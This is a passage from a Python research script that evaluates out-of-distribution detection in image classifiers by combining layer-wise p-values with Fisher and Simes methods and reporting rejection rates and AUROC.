per_class_limit=default_per_class_limit,\n shuffle_before_limit=True,limit_shuffle_seed=0)\n alternative_ds_name, split, kwargs = split.split('@')\n kwargs = literal_eval(kwargs) if kwargs else {}\n defaults.update(kwargs)\n return get_dataset(alternative_ds_name, split, **defaults)\n else:\n # use split as is\n return get_dataset(dataset, split, transform, limit=default_limit,\n per_class_limit=default_per_class_limit, limit_shuffle_seed=0)\n\n\ndef temp_scaling(model,loader_cal ,test_logits, device):\n model_temperature = ModelWithTemperature(model, device=device)\n model_temperature.set_temperature(loader_cal)\n return model_temperature.temperature_scale(test_logits.to(device)),model_temperature.temperature.cpu()\n\n\ndef _fusion_pvalues(dict_of_methods_pvalues, max_rank=2, reductions=None):\n # rejected['fusion']=MeterDict(meter_factory=SimpleOnlineMeterFactory(batched=True))\n ret_pvalues = {}\n from itertools import combinations\n if reductions is None:\n reductions = dict_of_methods_pvalues.keys()\n\n for i in range(2, max_rank + 1):\n for pval_method_comb in combinations(reductions, i):\n fusion_name = ''\n fused_pval = []\n for pval_method in pval_method_comb:\n fusion_name += f'+{pval_method}'\n fused_pval.append(dict_of_methods_pvalues[pval_method])\n fused_pval = th.stack(fused_pval, 1)\n ret_pvalues[fusion_name] = rd.calc_simes(fused_pval).squeeze(1)\n return ret_pvalues\n\n\ndef _gen_curve(pvalues_for_val,alpha_list):\n rejected_ = []\n for alpha_ in alpha_list:\n rejected_.append((pvalues_for_val <= alpha_).float()) # .unsqueeze(1))\n return th.stack(rejected_, 1)\n\n\ndef _maybe_concat_tensor_dict(dictionary,key,value,axis=0):\n if key in dictionary:\n dictionary[key] = th.cat([dictionary[key], value], axis)\n else:\n dictionary[key] = value\n\n\ndef evaluate_data(loader, model, detector, model_device, alpha_list=None, in_dist=False, limit=None,\n simes_l=False, fusions=False, keep_intermidiate_pvalues=False,\n temperature_cal_loader=None, temperature=None, plot=False, msp=True):\n gen_curve_fn = partial(_gen_curve, alpha_list=alpha_list)\n alpha_list = alpha_list or [0.05]\n TNR95_id = alpha_list.index(0.05)\n rejected = {}\n master_pvalues_dict = {}\n predictions = {}\n accuracy_dict = MeterDict(AverageMeter)\n\n def _extend_master_pvalues_dict(pvalues_dict, prefix=''):\n for reduction_name, pvalues in pvalues_dict.items():\n reduction_name = f'{prefix}-{reduction_name}'\n _maybe_concat_tensor_dict(master_pvalues_dict, reduction_name, pvalues)\n\n def _evaluate_pvalues_dict(pvalues_dict, logits, labels=None): #, prefix=''):\n predicted = logits.argmax(1).cpu()\n num_samples = logits.shape[0]\n num_classes = logits.shape[1]\n if labels is not None:\n correct_predictions = labels == predicted\n incorrect_preds = th.logical_not(correct_predictions)\n\n for reduction_name, pvalues in pvalues_dict.items():\n #reduction_name = f'{prefix}-{reduction_name}'\n # if save_pvalues and bool(re.match(save_pvalues, reduction_name)):\n # if reduction_name in save_pvalues_dict:\n # save_pvalues_dict[reduction_name] = th.cat([save_pvalues_dict[reduction_name], pvalues], 0)\n # else:\n # save_pvalues_dict[reduction_name] = pvalues\n\n # measure rejection rates for a range of pvalues under each measure and each reduction\n if reduction_name not in rejected:\n rejected[reduction_name] = MeterDict(meter_factory=SimpleOnlineMeterFactory(batched=True))\n if pvalues.shape[1] != num_classes:\n rejected[reduction_name].update({\n 'joint_pval_roc': gen_curve_fn(pvalues.squeeze(1)),\n # 'max_pval_roc': gen_curve_fn(best_class_pval),\n })\n else:\n # aggragate pvalues or return per reduction score\n # best_class_pval, best_class_pval_id = pvalues.max(1)\n class_conditional_pval = pvalues[th.arange(num_samples), predicted]\n # joint dstribution: single pvalue for all classes\n rejected[reduction_name].update({\n 'class_conditional_pval_roc': gen_curve_fn(class_conditional_pval),\n # 'max_pval_roc': gen_curve_fn(best_class_pval),\n })\n if in_dist:\n t1_likely, t5_likely = accuracy(pvalues, labels, (1, 5))\n\n # rescaled_outputs = out*pvalues\n # t1_rescaled, t5_rescaled = accuracy(rescaled_outputs, l, (1, 5))\n\n #rescaled_outputs_post_smx = th.nn.functional.softmax(logits, -1) * pvalues\n #t1_rescaled_smx, t5_rescaled_smx = accuracy(rescaled_outputs_post_smx, labels, (1, 5))\n\n accuracy_dict.update({\n f'{reduction_name}-pval_acc': (th.stack([t1_likely, t5_likely]), num_samples),\n # f'{reduction_name}-rescaled_t1': (t1_rescaled, out.shape[0]),\n # f'{reduction_name}-rescaled_t5': (t5_rescaled, out.shape[0]),\n # f'{reduction_name}-rescaled-smx_acc': (\n # th.stack([t1_rescaled_smx, t5_rescaled_smx]), num_samples),\n })\n\n # pvalue of the annotated class\n true_class_pval = pvalues[th.arange(num_samples), labels]\n # the pvalue of correct class prediction\n correct_pred_pvalues = true_class_pval[correct_predictions]\n # what was the pvalue of the correct class pval when prediction was wrong\n true_class_pvalues_on_error = true_class_pval[incorrect_preds]\n predicted_class_pvalues_on_error = class_conditional_pval[incorrect_preds]\n rejected[reduction_name].update({\n 'true_pval_mean': true_class_pval,\n 'correct_pval_mean': correct_pred_pvalues,\n 'incorrect_pval_mean': predicted_class_pvalues_on_error,\n 'true_pval_on_error_mean': true_class_pvalues_on_error\n })\n\n rejected[reduction_name].update({\n 'true_pval_roc': gen_curve_fn(true_class_pval),\n 'correct_pval_roc': gen_curve_fn(correct_pred_pvalues),\n 'incorrect_pval_roc': gen_curve_fn(predicted_class_pvalues_on_error),\n })\n\n def _report(level=logging.INFO):\n log_fn = lambda msg: logging.log(level=level, msg=msg)\n compose_acc_msg = lambda key: f'{accuracy_dict[key].avg.numpy()} ({accuracy_dict[key].std.numpy()})'\n if in_dist:\n log_fn(f'\\nModel accuracy: {compose_acc_msg(\"model_acc\")}')\n\n for reduction_name in rejected.keys():\n log_fn(f'\\t{reduction_name} metric:')\n if in_dist and f\"{reduction_name}-pval_acc\" in accuracy_dict:\n # report mean accuracy\n log_fn(f'\\t\\tPVAL accuracy: {compose_acc_msg(f\"{reduction_name}-pval_acc\")} \\t')\n #log_fn(f'\\t\\tSCALED-SMX accuracy: {compose_acc_msg(f\"{reduction_name}-rescaled-smx_acc\")} \\t')\n # log_fn(f'\\t\\tSCALED: Prec@1 {accuracy_dict[f\"{reduction_name}-rescaled_t1\"].avg:.3f} '\n # f'({accuracy_dict[f\"{reduction_name}-rescaled_t1\"].std:.3f}) \\t'\n # f'Prec@5 {accuracy_dict[f\"{reduction_name}-rescaled_t5\"].avg:.3f} '\n # f'({accuracy_dict[f\"{reduction_name}-rescaled_t5\"].std:.3f})')\n\n # report rejection results\n # log_fn(f'\\t\\tMAX_PVAL-Rejected: {rejected[reduction_name][\"max_pval_roc\"].mean.numpy()[TNR95_id-5:TNR95_id+5]}')\n for n, rejection_meter in rejected[reduction_name].items():\n if n.endswith('_pval_roc'):\n log_fn(\n f'\\t\\t{n[:-9]}-Rejected: {rejected[reduction_name][n].mean.numpy()[TNR95_id - 5:TNR95_id + 5]}')\n\n log_fn(f'\\tRejection results around TNR:{alpha_list[TNR95_id]}\\tTNR_ID:{TNR95_id}')\n\n def _predict():\n intermidiate_pvalues = []\n _labels = []\n _logits = []\n model.eval()\n model.to(model_device)\n batch_count = 0\n with th.no_grad():\n for d, l in tqdm.tqdm(loader, total=len(loader)):\n if limit and batch_count * d.shape[0] >= limit:\n break\n batch_count += 1\n out = model(d.to(model_device))\n _logits.append(out)\n if in_dist:\n # model accuracy\n t1, t5 = accuracy(out, l, (1, 5))\n accuracy_dict.update({'model_acc': (th.stack([t1, t5]), out.shape[0])})\n _labels.append(l)\n\n if keep_intermidiate_pvalues:\n #todo concat instead\n intermidiate_pvalues.append(detector.stats_recorder.record.copy())\n\n ## extract pvalues and evaluate them\n if isinstance(detector.filter_layer, ls.GroupWhiteListInclude):\n pvalues_dict_fisher_groups = detector.get_fisher_groups()\n _extend_master_pvalues_dict(pvalues_dict_fisher_groups, 'fisher_group')\n #call _evaluate_pvalues_dict to average over each batch (reduce memory)\n #_evaluate_pvalues_dict(out,l,pvalues_dict_fisher_groups, 'fisher_group')\n\n pvalues_dict_fisher = detector.get_fisher()\n _extend_master_pvalues_dict(pvalues_dict_fisher, 'fisher')\n #_evaluate_pvalues_dict(out,l,pvalues_dict_fisher, 'fisher')\n if simes_l:\n pvalues_dict_simes = detector.get_simes()\n _extend_master_pvalues_dict(pvalues_dict_simes, 'simes')\n #_evaluate_pvalues_dict(out,l,pvalues_dict_simes, 'simes')\n\n if fusions:\n if simes_l:\n joint_dict = {}\n for pval_layer_reduction_method, pval_dict in zip(['simes', 'fisher'],\n [pvalues_dict_simes, pvalues_dict_fisher]):\n joint_dict.update({f'{pval_layer_reduction_method}-{rm}': p for rm, p in pval_dict.items()})\n pvalues_fusion = _fusion_pvalues(joint_dict, 2)\n else:\n pvalues_fusion = _fusion_pvalues(pvalues_dict_fisher, 2)\n _extend_master_pvalues_dict(pvalues_fusion, 'fusion')\n #_evaluate_pvalues_dict(out,l,pvalues_fusion, 'fusion')\n\n detector.stats_recorder.record.clear()\n _report(logging.DEBUG)\n\n return th.cat(_logits), th.cat(_labels) if in_dist else None, intermidiate_pvalues\n\n logits, labels, intermidiate_pvalues = _predict()\n scaled_logits = None\n ## pack results\n ret_dict = {}\n if temperature_cal_loader or temperature:\n if temperature is None:\n detector.set_tracking(False)\n scaled_logits, temperature = temp_scaling(model, temperature_cal_loader, logits, args.device)\n detector.set_tracking(True)\n else:\n scaled_logits = logits / temperature\n\n predictions['logits_scaled'] = scaled_logits\n if msp:\n with th.no_grad():\n softmax_prob_dict = {'MSP': F.softmax(logits).cpu()}\n if scaled_logits:\n softmax_prob_dict['calibrated_MSP'] = F.softmax(scaled_logits).cpu()\n _extend_master_pvalues_dict(softmax_prob_dict, 'logits')\n\n with th.no_grad():\n _evaluate_pvalues_dict(master_pvalues_dict, logits, labels)\n ## end of eval report\n logging.info(f'DONE: {getattr(loader.dataset,\"root\",loader.dataset)}')\n _report()\n\n if in_dist and plot:\n fig, (ax1, ax2, ax3) = plt.subplots(3, 1)\n\n for reduction_name, rejected_p in rejected.items():\n ## strip meter dict functionality for simpler post-processing\n reduction_dict = {}\n for k, v in rejected_p.items():\n # keeping meter object - potentially remove it here\n reduction_dict[k] = v\n ret_dict[reduction_name] = reduction_dict\n if in_dist and plot:\n # plot\n ax1.plot(args.alphas, reduction_dict['correct_pval_roc'].mean, label=reduction_name)\n ax2.plot(args.alphas, reduction_dict['incorrect_pval_roc'].mean)\n ax3.plot(reduction_dict['correct_pval_roc'].mean, reduction_dict['incorrect_pval_roc'].mean)\n\n if in_dist and plot:\n ax1.set_ylabel('correct prediction rate')\n ax2.set_ylabel('incorrect prediction rate')\n ax3.set_xlabel('correct rate')\n ax3.set_ylabel('incorrect rate')\n ax2.set_xlabel('assigned probability')\n ax1.legend(loc='upper left')\n plt.show()\n\n master_pvalues_dict['intermidiate_pvalues']=intermidiate_pvalues\n for reduction_name_accuracy, accuracy_d in accuracy_dict.items():\n ret_dict[reduction_name_accuracy] = accuracy_d\n\n #result_summary({args.dataset:ret_dict},args.get_args_dict())\n return ret_dict, master_pvalues_dict, temperature\n\n # Important! recorder hooks should be removed when done\n\n\ndef result_summary(res_dict, args_dict, TNR_target=0.05, skip_pattern=None, include_pattern='.*',\n pvalue_record=None):\n from utils.meters import simple_auc\n from _collections import OrderedDict\n ## if not configured setup logging for external caller\n if not logging.getLogger('').handlers:\n setup_logging()\n in_dist = args_dict['dataset']\n alphas = args_dict['alphas']\n logging.info(f'Report for {args_dict[\"model\"]} - {in_dist}')\n logging.info(f'Tag: {args_dict[\"tag\"]}')\n result_dict = OrderedDict(model=args_dict[\"model\"], in_dist=args_dict['dataset'], LDA=args_dict.get('LDA'),\n joint=args_dict['measure_joint_distribution'], tag=args_dict['tag'],\n channles_sellect=args_dict.get('channel_selection_fn'))\n # read indist results to calibrate alpha value for target TNR\n rows = []\n accuracies = {'model': {}}\n for reduction_name, reduction_metrics in res_dict[in_dist].items():\n accuracies[reduction_name] = {}\n if reduction_name.endswith('_acc'):\n acc = reduction_metrics.mean.cpu().numpy()\n std = reduction_metrics.std.cpu().numpy()\n acc_name = reduction_name.replace('_acc', '')\n if acc_name == 'model':\n reduction_name = 'model'\n if acc_name.endswith('rescaled-smx'):\n reduction_name = acc_name[:-13]\n acc_name = 'model_rescaled_smx'\n elif acc_name.endswith('-pval'):\n reduction_name = acc_name[:-5]\n acc_name = 'pval'\n\n accuracies[reduction_name][f'{acc_name}_t1'] = acc[0]\n accuracies[reduction_name][f'{acc_name}_t5'] = acc[1]\n accuracies[reduction_name][f'{acc_name}_std_t1'] = std[0]\n\n for reduction_name, reduction_metrics in res_dict[in_dist].items():\n if skip_pattern and bool(re.match(skip_pattern, reduction_name)) or include_pattern and not bool(\n re.match(include_pattern, reduction_name)):\n continue\n result_dict['reduction'] = reduction_name\n result_dict.update(**accuracies['model'])\n result_dict.update(**accuracies[reduction_name])\n logging.info(reduction_name)\n if type(reduction_metrics) != dict:\n # report simple metric\n logging.info(f'\\t{reduction_metrics.mean}\\t({reduction_metrics.std})')\n continue\n # report reduction specific metrics\n for metric_name, meter_object in reduction_metrics.items():\n metric_stats = MeterDict()\n if not metric_name.endswith('_roc'):\n logging.info(f'\\t{metric_name}: {meter_object.mean.numpy():0.3}')\n continue\n FPR = meter_object.mean.numpy()\n calibrated_alpha_id = min((FPR < TNR_target).sum() - 1,len(FPR))\n\n if calibrated_alpha_id == -1:\n # all pvalues are larger than alpha\n fpr_under_target_alpha = meter_object.mean[0]\n interp_alpha = FPR[0]\n calibrated_alpha_id = 0\n else:\n fpr_under_target_alpha = FPR[calibrated_alpha_id]\n # actual rejection threshold to use for TNR 95%\n interp_alpha = np.interp(0.05, FPR.squeeze(), alphas)\n\n result_dict.update(dict(metric_name=metric_name, FPR_strict=fpr_under_target_alpha,\n FPR_over=FPR[calibrated_alpha_id + 1],\n chosen_alpha=interp_alpha))\n logging.info(f'\\t{metric_name} - in-dist rejected: '\n # f'alpha-{indist_pvalues_roc[alphas.index(TNR_target)]:0.3f} ({TNR_target:0.3f}), '\n f'under-{fpr_under_target_alpha:0.3f} ({alphas[calibrated_alpha_id]:0.3f}), '\n f'interp-{TNR_target:0.3f} ({interp_alpha:0.3f}), '\n f'over-{FPR[calibrated_alpha_id + 1]:0.3f} ({alphas[calibrated_alpha_id + 1]})')\n\n if pvalue_record and reduction_name in pvalue_record[in_dist]:\n if metric_name.startswith('class_cond') and 'predicted_id' in pvalue_record[in_dist]:\n predicted_ids = pvalue_record[in_dist]['predicted_id']\n in_cc_pval_pred = pvalue_record[in_dist][reduction_name][\n th.arange(predicted_ids.shape[0]), predicted_ids]\n else:\n in_cc_pval_pred = pvalue_record[in_dist][reduction_name].max(1)[0]\n\n for target_dataset_name, reduction_metrics in res_dict.items():\n if target_dataset_name != in_dist and metric_name in reduction_metrics[reduction_name]:\n interp_rejected = np.interp(interp_alpha, alphas,\n reduction_metrics[reduction_name][metric_name].mean.numpy())\n TPR = reduction_metrics[reduction_name][metric_name].mean.numpy()\n raw_rejected = TPR[alphas.index(TNR_target)]\n auroc = simple_auc(TPR, FPR)\n logging.info(\n f'\\t\\t{target_dataset_name}:\\traw-{raw_rejected:0.3f}\\tinterp-{interp_rejected:0.3f}\\tAUROC:{auroc:0.3f}')\n if pvalue_record and reduction_name in pvalue_record[target_dataset_name]:\n if metric_name.startswith('class_cond') and 'predicted_id' in pvalue_record[\n target_dataset_name]:\n predicted_ids = pvalue_record[target_dataset_name]['predicted_id']\n out_cc_pval_pred = pvalue_record[target_dataset_name][reduction_name][\n th.arange(predicted_ids.shape[0]), predicted_ids]\n else:\n out_cc_pval_pred = pvalue_record[target_dataset_name][reduction_name].max(1)[0]\n\n m = metric(in_cc_pval_pred.numpy(), out_cc_pval_pred.numpy())\n logging.info(f'\\t\\t\\tbenchmark metrics: {m}')\n result_dict.update(**m)\n\n result_dict.update(\n dict(out_dist=target_dataset_name, TPR95_raw=raw_rejected, TPR95_interp=interp_rejected,\n AUROC=auroc))\n rows.append(result_dict.copy())\n\n if in_dist.startswith('cifar') and target_dataset_name.startswith('cifar'):\n continue\n metric_stats.update(\n dict(TPR95_raw=th.tensor([raw_rejected]), TPR95_interp=th.tensor([interp_rejected]),\n AUROC=th.tensor([auroc])))\n\n if target_dataset_name != in_dist and metric_name in reduction_metrics[reduction_name]:\n result_dict['out_dist'] = 'avg'\n logging.info(\n f'\\tmetric avg stats: {[k + \" \" + str(float(v)) for k, v in metric_stats.get_mean_dict().items()]}')\n result_dict.update(**metric_stats.get_mean_dict())\n rows.append(result_dict.copy())\n return rows\n\n\ndef report_from_file(path, skip_pattern=r'(^fusion)|(.*export*)', include_pattern=r'^fisher-.*-max_simes',\n output='report'):\n from pandas import DataFrame as df\n result_collection = []\n for p in glob(path):\n res = th.load(p, map_location='cpu')\n summ_rows = result_summary(res['results'], res['settings'], skip_pattern=skip_pattern,\n include_pattern=include_pattern,\n pvalue_record=res.get('pvalues_collection'))\n for r in summ_rows:\n r['result_file_path'] = p\n r['time_stamp'] = res.get('time_stamp')\n r['test_layers'] = res.get('test_layers')\n r['ref_layers'] = res.get('ref_layers')\n r.update(res['settings'])\n\n result_collection += summ_rows\n df(result_collection).to_csv(f'{output}.csv')\n\n\ndef measure_and_eval(args, export_pvalues=False, measure_only=False, cache_measure=True,\n keep_intermidiate_pvalues=False, compare_scaling=False, simes_on_layers=False,\n LDA_fisher=False, num_workers=2):\n from datetime import datetime\n TIME_START = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n rejection_results = {} # dataset , out\n model = getattr(models, args.model)(**(args.model_cfg))\n checkpoint = th.load(args.ckt_path, map_location='cpu')\n if 'state_dict' in checkpoint:\n checkpoint = checkpoint['state_dict']\n\n model.load_state_dict(checkpoint)\n if args.track_output:\n track_smx_output = 'softmax' in args.track_output\n track_fc_output = 'fc' in args.track_output\n model = TrackOutput(model, track_smx_output, track_fc_output, temperature=args.temperature)\n\n expected_transform_measure = get_transform(args.transform_dataset or args.dataset, augment=args.augment_measure)\n logging.info(f'get first split for measure {args.measure_split_part1}')\n measure_dataset_part1 = get_ds_split_modifier(args.dataset,args.measure_split_part1,expected_transform_measure,args.limit_measure,True)\n logging.info(f'split 1: size {len(measure_dataset_part1)}')\n if args.measure_split_part2:\n logging.info(f'get second split for measure {args.measure_split_part2}')\n measure_dataset_part2 = get_ds_split_modifier(args.dataset,args.measure_split_part2,expected_transform_measure,args.limit_measure,True)\n else:\n measure_dataset_part2 = measure_dataset_part1\n logging.info(f'split 2: size {len(measure_dataset_part2)}')\n\n exp_tag = f'{args.model}-{args.dataset}'\n if args.augment_measure:\n exp_tag += f'-augment'\n if args.measure_joint_distribution:\n exp_tag += f'-joint'\n if args.LDA:\n exp_tag += f'-LDA'\n if _MONITOR_OP_OUTPUTS:\n exp_tag += '-OUTMODE'\n if 'layer_select' in args.tag:\n sub_tags = args.tag.split('+')\n if len(sub_tags) == 1:\n calib_tag = '-@baseline'\n else:\n calib_tag = '-@'\n for t in sub_tags:\n if 'layer_select' in t:\n continue\n calib_tag += f'{t}+'\n\n calib_tag = calib_tag[:-1]\n\n else:\n calib_tag = args.tag\n\n calib_tag = f'{exp_tag}-{calib_tag}'\n os.path.join(args.cache_dir, f'measured_stats_per_class-{exp_tag}-raw.pth')\n part1_cache = os.path.join(args.cache_dir, f'measured_stats_per_class-{exp_tag}-raw.pth')\n calibrated_path = os.path.join(args.cache_dir, f'measured_stats_per_class-{calib_tag}.pth')\n exp_tag += f'-{args.tag}'\n if args.select_layer_mode and not args.recompute:\n import time\n while (not os.path.exists(calibrated_path)):\n print(f'waiting for file: {calibrated_path}')\n time.sleep(500)\n\n if not args.recompute and os.path.exists(calibrated_path):\n ref_stats = th.load(calibrated_path,\n map_location=args.collector_device if args.collector_device != 'same' else args.device)\n if type(ref_stats) == dict:\n args.spatial_reductions = ref_stats['args'].spatial_reductions\n ref_stats = ref_stats['refs']\n else:\n ref_stats = measure_v2(model, args, part1_cache, measure_dataset_part1, measure_dataset_part2,\n num_workers=num_workers, drop_last=_DROP_LAST_BATCH_MEASURE)\n if cache_measure:\n logging.info('saving reference stats dict')\n th.save(dict(refs=ref_stats, args=args), calibrated_path)\n if measure_only:\n return\n if args.select_layer_mode:\n selected_layers_names, args.include_matcher_fn_test = ls.get_select_layers_from_preset(args, model, ref_stats)\n logging.info(f'selected {len(selected_layers_names)}/{len(ref_stats[0])} layers: {selected_layers_names}')\n\n logging.info(f'building OOD detector')\n detector = OODDetector(model, ref_stats, right_sided_fisher_pvalue=args.right_sided_fisher_pvalue,\n include_matcher_fn=args.include_matcher_fn_test, shared_reductions=args.spatial_reductions,\n fisher_layer_weights=args.fisher_layer_weights, LDA_fisher=LDA_fisher)\n gc.collect()\n logging.info(f'evaluating inliers')\n expected_transform_test = get_transform(args.transform_dataset or args.dataset, augment=args.augment_test)\n val_ds = get_ds_split_modifier(args.dataset, args.test_split, expected_transform_test, args.limit_test, False)\n\n # todo add adversarial samples test\n # optional run in-dist data evaluate per class to simplify analysis\n # for class_id,class_name in enumerate(val_ds.classes):\n # sampler = th.utils.data.SubsetRandomSampler(th.where(targets==class_id)[0]) #th.utils.data.RandomSampler(ds, replacement=True,num_samples=5000)\n sampler = None\n val_loader = th.utils.data.DataLoader(\n val_ds, sampler=sampler,\n batch_size=args.batch_size_test, shuffle=False,\n num_workers=num_workers, pin_memory=True, drop_last=False)\n\n temperature_cal_loader = None\n if compare_scaling:\n temperature_cal_loader = th.utils.data.DataLoader(\n measure_dataset_part2, sampler=sampler,\n batch_size=args.batch_size_test, shuffle=False,\n num_workers=0, pin_memory=False, drop_last=False)\n\n e_ret = evaluate_data(val_loader, model, detector, args.device, alpha_list=args.alphas, in_dist=True,\n limit=args.limit_test,\n keep_intermidiate_pvalues=keep_intermidiate_pvalues,\n temperature_cal_loader=temperature_cal_loader,\n simes_l=simes_on_layers)\n\n if export_pvalues:\n pvalues_collection = {args.dataset: e_ret[1]}\n rejection_results[args.dataset] = e_ret[0]\n\n logging.info(f'evaluating outliers')\n\n for ood_dataset in args.ood_datasets:\n if ood_dataset == args.dataset:\n continue\n ood_ds = get_dataset(ood_dataset, 'val', expected_transform_test, limit=args.limit_test,\n per_class_limit=False, shuffle_before_limit=True, limit_shuffle_seed=0)\n\n ood_loader = th.utils.data.DataLoader(\n ood_ds, sampler=None,\n batch_size=args.batch_size_test, shuffle=False,\n num_workers=num_workers, pin_memory=True, drop_last=False)\n logging.info(f'evaluating {ood_dataset}')\n e_ret = evaluate_data(ood_loader, model, detector, args.device, alpha_list=args.alphas,\n limit=args.limit_test,\n keep_intermidiate_pvalues=keep_intermidiate_pvalues,\n temperature=e_ret[2] if compare_scaling else None,\n simes_l=simes_on_layers)\n if export_pvalues:\n pvalues_collection[ood_dataset] = e_ret[1]\n rejection_results[ood_dataset] = e_ret[0]\n\n save = {'results': rejection_results, 'settings': args.get_args_dict(), 'time_stamp': TIME_START,\n 'test_layers': detector.test_layers, 'ref_layers': detector.ref_layers}\n\n for reduction_name, fn in args.spatial_reductions.items():\n if isinstance(fn, rd.StatefulReductionFactory):\n fn.reset()\n\n if export_pvalues:\n save['pvalues_collection'] = pvalues_collection\n exp_tag += '-pval_export'\n\n th.save(save, os.path.join(args.results_root, f'{TIME_START}_experiment_results-{exp_tag}.pth'))\n result_summary(rejection_results, args.get_args_dict(), pvalue_record=pvalues_collection)\n\n\nif __name__ == '__main__':\n np.set_printoptions(3)\n from presets import edit_data_regime, train_val_test_on_val_experiments, oe_experiments_train_val_test_on_val, \\\n lee2018_experiments, train_val_experiments, val_only_experiments, \\\n oe_experiments, oe_experiments_tv, large_scale\n from adversarial_compare_config import _SMALL_SCALE_OOD_DATASETS, _LARGE_SCALE_OOD_DATASETS\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--seed', default=0, type=int)\n parser.add_argument('--device_id', default=0, type=int)\n parser.add_argument('--n_workers', default=2, type=int)\n parser.add_argument('--split_exp_to_num_chunks', default=None, type=int)\n parser.add_argument('--exp_chunk_id', default=0, type=int)\n parser.add_argument('--limit_test', default=None, type=int)\n parser.add_argument('--exp_ids', default=None, type=int, nargs='+')\n parser.add_argument('--cut', default=0, type=float)\n parser.add_argument('--temperature', default=None, type=float)\n parser.add_argument('--last_layer_weight', default=None, type=float)\n parser.add_argument('--slice_layers_mode', default=None, type=str,\n choices=['auto', 'auto_group', 'slice', 'positional'])\n parser.add_argument('--ood_datasets', default=None, type=str, nargs='+',\n choices=_SMALL_SCALE_OOD_DATASETS + _LARGE_SCALE_OOD_DATASETS)\n parser.add_argument('--tag_prefix', default='', type=str)\n parser.add_argument('--track_last_layer_output', default='fc', type=str, choices=['', 'softmax', 'fc'])\n parser.add_argument('-r', action='store_true')\n parser.add_argument('-last_layer_only', action='store_true')\n parser.add_argument('-measure_val_test_val', action='store_true')\n parser.add_argument('-ablation', action='store_true')\n parser.add_argument('-LDA_fisher', action='store_true')\n terminal = parser.parse_args()\n ##### master controls\n os.environ['CUDA_VISIBLE_DEVICES'] = str(terminal.device_id)\n\n _split_by_dev = False\n OFFSET = 0\n SEED = terminal.seed\n RANDOM_CHANNEL_CUT = terminal.cut\n RECOMPUTE = terminal.r\n N_ALPHAS = 100\n LIMIT_TEST = None # 10000\n LAST_LAYER_WEIGHT = terminal.last_layer_weight # 1.0 #None # normalized weight of final layer for fisher statistic\n CLASS_DEPENDENT_OUTPUT = False\n TRACK_OUTPUT_LAYER = 'fc' # 'softmax' None 'fc'\n TAG_BASE = terminal.tag_prefix\n if terminal.measure_val_test_val:\n TAG_BASE += 'measure_train_val_test_on_val' # 'measure_train_val_test_on_val' #'My-Tag'\n experiments = train_val_test_on_val_experiments + oe_experiments_train_val_test_on_val\n else:\n TAG_BASE += 'measure_train_test_on_val' # 'measure_train_val_test_on_val' #'My-Tag'\n experiments = lee2018_experiments + oe_experiments # + large_scale\n\n if terminal.ablation:\n TAG_BASE += '_ablation'\n\n if terminal.exp_ids:\n experiments = [experiments[id] for id in terminal.exp_ids]\n if terminal.split_exp_to_num_chunks:\n assert terminal.exp_chunk_id >= 0, terminal.split_exp_to_num_chunks > 1\n n_exp = len(experiments)\n exp_per_chunck = int(np.ceil(n_exp / terminal.split_exp_to_num_chunks))\n _start = terminal.exp_chunk_id * exp_per_chunck\n _end = _start + exp_per_chunck\n print(f'total experiments before chunking: {n_exp},\\t\\nstart_id {_start},\\tstop_id {_end - 1}')\n experiments = experiments[_start:_end]\n print(f'running {len(experiments)} experiments')\n # else:\n # experiments = [experiments[(DEVICE_ID - OFFSET)]]\n\n # experiments = edit_data_regime(lee2018_experiments.copy(), measure_size_1=1.0, measure_size_2=1.0, test_size=1.0,\n # measure_split_1='train', measure_split_2 = 'train',\n # allow_intersecting_measure = False, allow_intersecting_test = True, seed = 0)\n\n measure_kwargs = dict(export_pvalues=r'.*', # r'^fisher-.*-max',## this is require for reference metric\n measure_only=False,\n cache_measure=True,\n simes_on_layers=terminal.ablation,\n keep_intermidiate_pvalues=False,\n compare_scaling=False,\n LDA_fisher=terminal.LDA_fisher,\n num_workers=terminal.n_workers)\n\n\n def common_overwrites():\n alphas = [i / N_ALPHAS for i in range(0, N_ALPHAS + 1)]\n recompute = terminal.r\n device = 'cuda'\n if terminal.limit_test:\n limit_test = terminal.limit_test\n augment_measure = False\n measure_joint_distribution = False # do not measure per class\n tag = TAG_BASE\n\n if SEED is not None:\n tag += f'-seed_{SEED}'\n\n if RANDOM_CHANNEL_CUT > 0:\n tag += f'-random_c_select_{RANDOM_CHANNEL_CUT}'\n channel_selection_fn = partial(cs.sample_random_channels, relative_cut=RANDOM_CHANNEL_CUT,\n seed=SEED) # None\n else:\n channel_selection_fn = None\n # channel_selection_fn = partial(cs.find_most_seperable_channels_class_dependent, relative_cut=0.2)\n # track_output = 'softmax'\n\n ## use mahalanobis as channel reduction under LDA assumption\n # mahalanobis_ch_reduction=True\n # LDA = True\n\n ## grouped cluster layers\n # select_layer_mode = 'auto_group'# 'auto'\n # select_layer_kwargs = dict(t=3, criterion='maxclust', channle_reduction_method='simes_c')#{'normalized_positions' : [0.8,0.9,1.0]} # None # dict(t=3, criterion='maxclust', channle_reduction_method='simes_c')\n\n fisher_ch_reduction = terminal.ablation\n track_output = terminal.track_last_layer_output\n temperature = terminal.temperature\n if track_output:\n tag += f'-{track_output}'\n if terminal.last_layer_weight:\n ## place more weight on final layer pvalue when computing fisher statistic\n tag += f'-weighted'\n if terminal.last_layer_weight == 1.0:\n ## conformal - output only\n include_matcher_fn_test = ls.output_only_fn\n include_matcher_fn_measure = ls.output_only_fn\n if track_output == 'fc':\n fisher_layer_weights = {'output_fc': terminal.last_layer_weight}\n elif track_output == 'softmax':\n tag += f'_temperature_{temperature}' # todo update this with actual val\n fisher_layer_weights = {'output_softmax': terminal.last_layer_weight}\n\n if CLASS_DEPENDENT_OUTPUT:\n channel_selection_fn = cs.output_select_channels_class_dependent\n tag += '-CDO'\n\n ## slice layers\n # select_layer_mode = 'slice' #'positional' # None # 'auto_group'# 'auto'\n # select_layer_kwargs = dict(start=0.75,stop=0.9999,stride=3,keep_last_n=2)\n\n # limit_measure = None #1000 # per class limit\n if terminal.ood_datasets:\n ood_datasets = terminal.ood_datasets\n # batch_size_measure=5000\n return locals()\n\n # exp_ids=[]\n # experiments = [experiments[exp_id] for exp_id in exp_ids]\n setup_logging()\n for args in experiments:\n args.update(common_overwrites())\n logging.info(args)\n if args.num_classes > 300:\n _USE_PERCENTILE_DEVICE = True\n else:\n _USE_PERCENTILE_DEVICE = False\n measure_and_eval(args, **measure_kwargs)\n # report_from_file('./Final_results_baseine_2020-10-08/*/*', skip_pattern=None, include_pattern=r'.*')\n report_from_file(os.path.join(args.results_root, 